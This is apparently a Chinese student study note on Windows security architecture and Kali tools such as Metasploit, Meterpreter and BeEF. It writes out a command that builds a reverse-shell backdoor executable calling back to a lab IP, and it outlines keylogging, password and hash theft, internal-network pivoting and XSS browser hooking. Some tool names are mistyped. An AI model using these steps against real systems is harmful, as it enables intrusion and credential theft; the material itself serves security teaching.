Windows 系統架構:Windows 系統架構包括操做系統內核,以及用戶代碼空間。
操做系統內核模塊:操做系統內核模塊包括:Windows 執行體、Windows 內核體、設備驅動程序、硬件抽象層、Windows 窗口與圖形界面接口內核實現代碼
用戶代碼模塊:用戶代碼模塊包括:系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL
Windows 下的核心機制:Windows 進程和線程管理機制; Windows 內存管理機制;Windows 文件管理機制;Windows 註冊表管理機制;Windows 的網絡機制。
Windows 操做系統的安全架構和機制:基於引用監控器模型來實現基本的對象安全模型。
Windows 的安全機制:Windows 身份認證機制;Windows 受權與訪問控制機制、Windows 安全審計機制、Windows 安全中心、其餘安全機制。
Windows 身份認證機制:以安全主體概念來包含全部進行系統資源訪問請求的實體對象,有用戶、用戶組和計算機三大類。
Windows 安全攻防技術:分爲遠程安全攻防技術和本地安全攻防技術。
Windows 遠程攻擊技術:遠程口令猜想與破解攻擊;攻擊Windows網絡服務;攻擊Windows客戶端及用戶。
端口:遠程桌面終端服務運行於TCP 3389端口;Windows 操做系統默認開放的13五、13七、13八、13九、445端口所提供的網絡及本地服務是黑客攻擊主要目標。
針對Windows 本地的攻擊:Windows 本地特權提高;Windows 敏感信息竊取;Windows 消蹤滅跡(刪除掩蓋入侵痕跡); Windows 遠程控制與後門程序(實現對被入侵主機的持久控制)。html
kali下的漏洞分析工具集以下圖
一、searchsploit能夠方便地藉助關鍵詞搜索漏洞信息以及漏洞對應的exp,例:searchsploit wordpress
查看exp
2.將網絡常見漏洞作成一個網絡漏洞利用集
ikat自動化開啓不一樣的exp。等待目標訪問中招。
termineter旨在評估智能電錶的安全性linux
瞭解kali linux下漏洞利用工具集中Metasploit攻擊框架的基本使用
1.啓動服務:在Kali中使用Metasploit,須要先開啓PostgreSQL數據庫服務和metasploit服務,而後就能夠利用msf數據庫查詢exploit和記錄。
2.路徑介紹:Kali中msf的路徑爲/usr/share/metasploit-framework
3.基本命令
打開msf
4.測試示例:發現漏洞,搜索exploit
在這一步驟中並未發現匹配項sql
瞭解kali linux下漏洞利用工具集中Metasploit的Meterprete模塊
針對windows操做系統,反向鏈接shell,使用起來比較穩定
1.生成Meterpreter後門:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
2.打開MSF,開啓監聽 選擇exploit/multi/handler
3.在目標機器上執行door.exe
四、經過help命令查看可執行的命令
五、常見命令使用,包括系統信息,抓取屏幕截圖與抓取HASH等。
六、目錄瀏覽
七、鍵盤監聽
八、擴展工具,load/use以後再輸入help,就能夠了看到有關這個模塊的命令的說明了
九、擴展工具之Minikatz,抓取本地密碼明文shell
在跳板獲取必定權限後須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,藉助msf已經獲得的Meterpreter後門,可使系列的操做更容易。
一、查看當前網卡、網段信息。ifconfig
二、添加路由表run autoroute -s 10.0.0.1
可使用msf中的模塊跨網段攻擊或掃描。可經過腳本autoroute快速添加。
三、開socket代理,經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,sqlmap,nmap使用。經過代理便可訪問內網計算機。
四、經過background和session -i能夠自由切換進入session。
五、輸入run能夠看到在meterpreter上能夠作的不少命令。
六、經過run post/能夠看到後滲透測試模塊
七、獲取內網信息 run arp_acanner -h
八、也能夠上傳文件,作端口轉發後進行後續測試。數據庫
瞭解kali linux下漏洞利用工具集中BeeF工具的使用,BeeF是一款專一於瀏覽器端的滲透測試工具
1.命令行下啓動BeeFbeef-xss
二、假設被測試主機因爲XSS漏洞請求到http://127.0.0.1:3000/demos/basic.html頁面
執行成功後出現以下效果圖:
五、Proxy功能:選中目標主機,點右鍵,在菜單中選中Use as Proxy;而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。
六、BeEF默認是不加載Metasploit的,若是要使用Metasploit豐富的攻擊模塊,須要作些配置.
保證此處IP等信息設置正確(不適用127.0.0.1,需使用本機IP),並修改Custom路徑:
配置好後打開msfconsole,運行命令:load msgrpc ServerHost=192.168.30.1 Pass=abc123
執行./beef -x
這時從新加載Metasploit的exploit模塊
重啓beef服務:service beef-xss restart
此時再訪問beef以前的頁面.發現Metasploit下多了許多模塊:windows